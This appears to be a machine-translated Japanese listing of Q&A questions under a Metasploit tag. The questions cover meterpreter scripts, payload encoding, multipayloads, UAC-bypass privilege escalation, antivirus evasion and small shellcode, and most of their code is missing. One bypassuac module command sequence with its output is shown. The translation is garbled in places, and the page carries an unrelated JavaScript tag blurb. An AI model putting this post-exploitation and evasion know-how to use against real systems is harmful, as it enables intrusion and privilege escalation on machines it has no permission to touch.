問題タブ [metasploit]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票する
1 に答える
358 参照

ruby - Meterpreterの実行中にrubyスクリプトでエラーが発生しました

私はこのウェブサイトが大好きです、それは他の人々の質問を通して私を大いに助けました、今私は参加しました、それで私はできればお互いを助けることができます。

ここに問題があります。VMで(metasploitスイートから)meterpreterを実行しているときに、侵入先のマシンのすべてのポートを中継し、ローカルマシンに仮想インターフェイスを作成するスクリプトを試しました。しかし、私はエラーが発生しています

Undefined method: each

コードに移動している間:

どういうわけか、私が囲んでいる線に関係していると思います##nilそうtemphostsでなければなりnilません、そして私はそれぞれのエラーを受け取ります。

誰かが私を良い方向に向けることができますか?

どうもありがとうございました。

PS:誰かが興味を持っている場合のスクリプトはここにあります:http://tools.pentester.es/multirelay

再度、感謝します!

0 投票する
1 に答える
853 参照

encoding - メタスプロイトでデフォルトでpayload.encodedが取得するエンコーディングは何ですか?

私はこの metasploit モジュールを分析しています。そして、どのエンコーディング方法が metasploit でデフォルトでpayload.encoded を取得するのか疑問に思っています。

そのエクスプロイトで(エンコーダーを設定せずに)print payload.encoded を実行したところ、次のような通常の文字列が得られました。

モジュールにはエンコーダ オプションがありますが、コメントされています。

私は、次のような標準の 16 進値でエンコードされたペイロードを見るのに慣れています。

誰かがペイロードによって返された文字列がどこから来て、どのエンコーディングを使用しているかを理解するのを手伝ってもらえますか?

0 投票する
2 に答える
8006 参照

security - multipayloadを使用したMetasploitジェネリック/カスタムペイロード

私は新しいMSF4(フレームワーク:4.1.0-release.13988、コンソール:4.1.0-release.13581)のマルチペイロードサポートをmsfvenomとカスタム/汎用ペイロードを使用して遊んでいますが、エンコーディングと互換性の観点からペイロードがサポートするものに関する情報。

基本的に、サーバー側のサービスをシャットダウンして、メータープリターにバインドされていないポートでリッスンさせる方法を検討しています。(エクスプロイトは別のポートに侵入します)

基本的に、msgboxとMeterpreterをexe、raw、および.rbとして連続して使用して、msfvenomを使用してマルチペイロードを作成しました。エンコーディング設定をそのままにして、Noneに設定してみました。(カスタム/汎用ペイロード.rbソースは、Noneエンコーディングのみを許可することについて何かを言っていることに注意してください)

EXITFUNCを「none」に設定して試してみました。

次に、generic / customペイロードが使用できるものにrawmultipayloadを書き込む必要があります:(raw、exe、.rb形式に書き込んでみたことに注意してください)

最後に、generic / customでmultipayloadを試してみましょう:(設定してエクスプロイトを試みる前に、毎回エクスプロイトをリロードしたことに注意してください)

そこで、「エンコーダがエンコードされていません...」というエラーの意味についての説明を見つけました。(http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions)これは、ステージャーのペイロードが入ってくる場所だと思います。

エラーの原因は、ステージングされていないため、windows / msgboxペイロードですか?それとも、マルチペイロードがステージングされていないということですか?それが遅い場合、ステージングされない限り、マルチペイロードがどのように機能するかはわかりません。2つのペイロードを組み合わせると、1つのペイロードよりも大きくなる可能性があります。

誰かが少なくともジェネリック/ペイロードペイロードと互換性があるはずのエンコーディングとフォーマットを説明して、それを除外できるようにできますか?マルチペイロードサポートへの参照は2、3しか見つかりませんでした。

前もって感謝します!一度これを機能させた方法で返信することを約束します。

0 投票する
1 に答える
1241 参照

security - metasploitデクローキングのソースコードはどこで入手できますか?

私は最近、Webサイトの訪問者の内部IPアドレスを取得することについて読んでいて、metasploitフレームワークで使用されるIPリゾルバーであるdecloak.netに出くわしました。

残念ながら、サンプルページがダウンしていて、ダウンロードへのリンクが壊れています-誰かがソースを入手する場所を知っていますか?それはもうmetasploitに含まれていますか?

0 投票する
1 に答える
3109 参照

metasploit - metasploit: bypassuac Windows 権限昇格がハングする

post/windows/escalate/bypassuac が失敗するようです

何らかの理由で、ポスト エクスプロイト モジュール bypassuac を動作させることができません。これは私がしたことです:

  1. ターゲット マシンで meterpreter セッションを開きました (NETWORKSERVICE ユーザーとして)
  2. セッションをバックグラウンドにする
  3. 次のようなポスト エクスプロイト モジュールを使用しようとしました。

    post/windows/escalate/bypassuac を使用 set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 エクスプロイト

  4. ポートはまだ使用されていないため、問題ないはずです。

  5. 出力は次のとおりです。

    [-] ハンドラーが 192.168.1.100:4444 にバインドできませんでした[ ] 0.0.0.0:4444でリバース ハンドラーを開始しました [ ] ペイロード ハンドラーを開始しています... [ ]バイパス UAC 実行可能ファイルをファイルシステムにアップロードしています... [ ] Meterpreter ステージャー実行可能ファイル 73802 バイトがアップロードされています.. [ ] エージェントをファイルシステムにアップロードしました.... [ ] ポストモジュールの実行が完了しました

  6. その後、コンソールに戻り、何もせず、新しいセッションも何もしません。

次のことを確認しました。

  1. 実行可能ファイル bypassuac-x86.exe を手動でターゲットにアップロードします。それは完全にうまくいきました。
  2. ウィルススキャナの警告ベルが実行可能ファイルから鳴らなかったかどうかを確認しました。彼らはしませんでした

実行可能ファイルを手動で実行する方法はありますか?システムレベルのアクセスで新しいメータープリターセッションを開く方法を誰かが説明してくれませんか?

または、何らかの方法でペイロードをエンコードし、カスタム テンプレートを使用してすべてのウイルス対策の可能性を回避できますか? エクスプロイト後のモジュールをエンコードするオプションはまだ見つかりません。

前もって感謝します

ハルバー

0 投票する
1 に答える
1389 参照

ruby - net/http で記述された既存の Ruby スクリプトを metasploit 補助として使用する

net/http で書かれた以下の ruby​​ コードを metasploit の補助として使いたい。

librex または gsub を使用したファイルの読み取り/書き込みと文字列操作をサポートする他の metasploit API のいずれかに簡単に変換するのに役立つものを知りたいです。

私のコードは次のとおりです。

終わり

0 投票する
1 に答える
4089 参照

security - metasploits の meterpreter ペイロードについて

メータプリタの仕組みについて、より深い知識を得たいと思います。次のコマンドで msfpayload によって作成されたペイロード windows/meterpreter/reverse_typ を逆アセンブルする場合:

次の結果が得られます。

このコードの意味をよりよく理解するにはどうすればよいですか? Meterpreter ペイロードが実際にどのように機能するかを理解したいのですが、残念ながらどこから始めればよいかわかりません。

IDA を使用してコードを調べることから始めましたが、それ以上のことはできませんでした。

読んでさらに勉強するためのリンクやリソースは大歓迎です!

0 投票する
1 に答える
830 参照

php - アプリケーションを起動するためのサーバー側スクリプト

私はこれまで、ページが開かれたときに実行され、metasploitを起動するphpスクリプトを作成しようとして失敗しました。

shell_execとexec、および他のすべての代替手段を試しましたが、msfconsoleを試してみると、単純なこと(ls、cdsなど)を実行できますが、何も実行されません。

また、Firefoxを起動する別のスクリプトを試しましたが、何も起こりません。

これで、phpがサーバー上で実行され、クライアントマシンでコンソールまたはFirefoxが開くことを期待していません。代わりに、それが機能するかどうかを確認するために、shell_execの出力をエコーアウトしようとしています!コマンドラインからこれを行うのと同じ方法で、ここでアプリが開いていることを確認できるはずです。

私は何が欠けていますか?

これを行う他の方法はありますか?(つまり、ユーザーが私のページを開くたびにmetasploitを起動します)

注:msfconsoleのフルパスを指定しようとしましたが、どちらも機能しませんでした。

これが私がこれまでに持っているものです:

「;show」ビットは、実際に何かを実行して印刷するために使用されましたが、違いはありませんでした。

0 投票する
2 に答える
2465 参照

shellcode - 295 バイトより小さいシェル生成シェルコード

295 バイトより小さいシェル生成シェルコードが必要です。Metasploit は通常、300 バイトを (はるかに) 超えるシェル生成シェルコードを生成します。

または、シェルを生成するシェルコードを圧縮できる方法はありますか?

編集: Windows XP/2003 用のこれらのシェルコードが必要です。

0 投票する
2 に答える
1543 参照

ruby - Metasploit は「nop ジェネレーターが成功しませんでした」を悪用します

いくつかの Metasploit エクスプロイトを実行しているときに、すべてのオプションを適切に設定して「exploit」コマンドを発行すると、「Nop generators successfully」エラーが発生します。

msfpayload を使って自分でペイロードを作成しようとすると、このエラーは発生せず、なぜこのエラーが発生するのか気になります。

(そのようなエクスプロイトの 1 つが squirrelmail_pgp_plugin です)

誰かが私にこれを説明できますか?